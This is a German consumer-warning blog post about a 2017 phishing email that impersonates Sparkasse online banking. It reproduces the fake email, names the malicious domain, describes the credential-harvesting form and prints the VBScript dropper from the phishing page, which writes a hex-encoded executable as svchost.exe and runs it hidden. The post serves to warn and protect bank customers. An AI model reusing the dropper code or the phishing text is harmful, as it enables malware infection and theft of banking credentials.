Sicherheits-Update von Sparkasse Online ([email protected]) ist Phishing! Achtung: Die verlinkte Seite enthält einen Virus!

Am Donnerstag, den 26. Oktober 2017 wurde durch unbekannte Dritte die folgende betrügerische E-Mail in deutscher Sprache versendet. Die E-Mail stammt nicht von der Sparkasse! Klicken Sie deswegen nicht auf den Link und geben Sie keine Daten ein! Klicken Sie schon deswegen nicht auf den Link, weil dieser einen Virus enthält und Ihren Rechner infizieren möchte (W32.Ramnit!html)!

Betreff: Sicherheits-Update
Absender: Sparkasse Online ([email protected])

Sehr geehrter Kunde,

Bitte beachten Sie, dass Ihr e-Banking-Zugang bald ablaeuft. Um diesen
Dienst weiterhin nutzen zu koennen, klicken Sie bitte auf den untenstehenden
Link um Ihren Zugang manuell mit unserem Sicherheits-Update zu
aktualisieren: Sparkasse Online-Banking.-Aktualisierung: klicken Sie hier

Nach Vervollstaendigung dieses Schrittes werden Sie von einem Mitarbeiter
unseres Kundendienstes zum Status Ihres Kontos kontaktiert.
Das Online-Banking bietet aber noch
viele weitere Vorteile.
DIE VORTEILE DES ONLINE-BANKINGS AUF EINEN BLICK:

– Kontozugang rund um die Uhr
– Schneller Zugriff aufs Girokonto
– E-Banking bequem vom PC aus
– Flexibel in jedem Winkel der Welt
– Uebersichtliche Kontofuehrung
– Hohe Sicherheitsstandards
– E-Banking ist kombinierbar mit Telefon-Banking

Um diese Dienste weiterhin problemlos nutzen zu koennen, fuehren Sie bitte
das Update so schnell wie moeglich durch.

Hochachtungsvoll,

Sparkasse Online Banking.

Achtung: Es handelt sich um eine betrügerische E-Mail! Die Nachricht wurde nicht von der Sparkasse versendet! Die Sparkasse hat mit der E-Mail nichts zu tun! Klicken Sie nicht auf den Link und geben Sie keine Daten ein! Klicken Sie schon deswegen nicht auf den Link, weil dieser einen Virus enthält und Ihren Rechner infizieren möchte (W32.Ramnit!html)!

Die Sparkassen haben eine Informationsseite zu „Phishing“. Leiten Sie solche E-Mails an [email protected] weiter!

Die verlinkte Domain sunview.ae/wp-admin/network/sicherheit/ gehört nicht zu den Sparkassen! Klicken Sie deswegen nicht auf den Link! 

Achtung: Die betrügerische Seite enthält am Ende des HTML-Code einen Virus! Klicken Sie schon deswegen nicht auf den Link:

<SCRIPT Language=VBScript><!–
DropFileName = „svchost.exe“
WriteData = „4D5A900003000000[…]7FFFF“
Set FSO = CreateObject(„Scripting.FileSystemObject“)
DropPath = FSO.GetSpecialFolder(2) & „\“ & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng(„&H“ & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject(„WScript.Shell“)
WSHshell.Run DropPath, 0
//–></SCRIPT>

Die betrügerische Seite blendet zunächst ein Bild ein…

… innerhalb von Sekunden zeigt die betrügerische Seite aber eher das Ende der Seite und fordert zum Login auf. Geben Sie keine Daten ein! Alle Eingaben werden an unbekannte Dritte übermittelt und können anschließend missbraucht werden!

Online-Banking     Anmeldename    PIN    >

Danach fordert die betrügerische Seite zur Eingabe diverser Daten auf. Geben Sie keine Daten ein! Alle Eingaben werden an unbekannte Dritte übermittelt und können anschließend missbraucht werden!

Sparkasse
Konto Aktualisierung
Antrag: Online-Konto Aktualisierung
Daten eingeben
Füllen Sie bitte alle untenstehenden, mit * gekennzeichneten Felder aus.
Persönliche Angaben (Teilnehmer):
* Anrede:
Titel:
* Vorname:
* Name:
* PIN:
* Anmeldename oder Legitimations-ID:
* Straße, Haus-Nr.:
* BLZ:
* PLZ:
* Wohnort:
* Geburtsdatum: (TT.MM.JJJJ)
* Handy:
* Telefon:
* Konto-Nr:

[ ] Freischaltung Online-Brokerage (Wertpapiergeschäfte per Internet)

Senden

Mit dem Absenden Ihrer Anmeldedaten erkennen Sie die
an.

Alle Eingaben werden per E-Mail an unbekannte Dritte übermittelt. Danach leitet die betrügerische Seite automatisch auf www.sparkasse.de weiter.

 

Haben Sie Daten eingegeben?

  • Lassen Sie umgehend Ihren Online-Banking-Zugang über die zentrale Sperr-Hotline 116 116 sperren!
  • Informieren Sie zu den banküblichen Öffnungszeiten Ihre Sparkasse!
  • Seien Sie vorsichtig bei Anrufen! Die Täter könnten sich dabei als Sparkasse ausgeben und Sie zur weiteren Nennung von Daten, ggf. sogar zur Erzeugung und Herausgabe einer TAN auffordern. Eine TAN wird immer nur für Aufträge gefordert. Bei Eingabe/Anzeige einer IBAN und eines Betrages würde es sich immer um einen Zahlungsauftrag (i. d. R. einer Überweisung) handeln!

Kommentar(e)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.